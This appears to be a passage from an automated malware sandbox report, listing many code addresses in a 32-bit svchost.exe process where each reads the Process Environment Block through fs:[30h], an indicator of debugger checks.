            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
